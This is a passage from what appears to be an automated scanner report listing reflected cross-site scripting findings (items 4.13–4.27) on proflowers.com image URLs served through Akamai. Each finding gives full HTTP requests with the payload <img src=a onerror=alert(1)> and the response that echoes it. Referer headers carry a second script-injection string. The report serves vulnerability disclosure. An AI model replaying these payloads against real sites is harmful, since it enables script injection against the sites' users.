Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:57 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img src=a onerror=alert(1)>f3fd15c3de9

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470 was submitted in the REST URL parameter 9. This input was echoed as 21185<img src=a onerror=alert(1)>f2d54a66470 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img src=a onerror=alert(1)>f2d54a66470

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53 was submitted in the REST URL parameter 9. This input was echoed as 49976<img src=a onerror=alert(1)>da2ce43ff53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/CAReaster_pnk10_PF49976<img src=a onerror=alert(1)>da2ce43ff53

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a was submitted in the REST URL parameter 9. This input was echoed as da675<img src=a onerror=alert(1)>a07aa15604a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img src=a onerror=alert(1)>a07aa15604a

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b was submitted in the REST URL parameter 9. This input was echoed as ce03a<img src=a onerror=alert(1)>9d86da2ef7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img src=a onerror=alert(1)>9d86da2ef7b

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc was submitted in the REST URL parameter 9. This input was echoed as 812a0<img src=a onerror=alert(1)>961839e23fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img src=a onerror=alert(1)>961839e23fc

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28 was submitted in the REST URL parameter 9. This input was echoed as f71af<img src=a onerror=alert(1)>58e4fbecd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tnf71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tnf71af<img src=a onerror=alert(1)>58e4fbecd28

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5 was submitted in the REST URL parameter 9. This input was echoed as 7d085<img src=a onerror=alert(1)>7f387170b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:22 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img src=a onerror=alert(1)>7f387170b5

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 28232<img%20src%3da%20onerror%3dalert(1)>694141eb889 was submitted in the REST URL parameter 9. This input was echoed as 28232<img src=a onerror=alert(1)>694141eb889 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img%20src%3da%20onerror%3dalert(1)>694141eb889?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img src=a onerror=alert(1)>694141eb889

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4 was submitted in the REST URL parameter 9. This input was echoed as e7337<img src=a onerror=alert(1)>5e353b6f9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:20 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img src=a onerror=alert(1)>5e353b6f9c4

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d was submitted in the REST URL parameter 9. This input was echoed as ec5f1<img src=a onerror=alert(1)>20d57e53c2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img src=a onerror=alert(1)>20d57e53c2d

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86 was submitted in the REST URL parameter 9. This input was echoed as f096f<img src=a onerror=alert(1)>6fffa73ca86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:09 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img src=a onerror=alert(1)>6fffa73ca86

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7 was submitted in the REST URL parameter 9. This input was echoed as ef49c<img src=a onerror=alert(1)>7e2a3d4dba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img src=a onerror=alert(1)>7e2a3d4dba7

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58 was submitted in the REST URL parameter 9. This input was echoed as 799e8<img src=a onerror=alert(1)>5150b0f3d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/F08_311626_PF799e8<img src=a onerror=alert(1)>5150b0f3d58

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39 was submitted in the REST URL parameter 9. This input was echoed as d8768<img src=a onerror=alert(1)>6cd8c2fda39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PFd8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:02 GMT
Connection: close

Unable to find /ProvideCommerce/FD08_149362_W_2_PFd8768<img src=a onerror=alert(1)>6cd8c2fda39

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47 was submitted in the REST URL parameter 9. This input was echoed as 5df3f<img src=a onerror=alert(1)>a18490b2d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:37 GMT
Connection: close

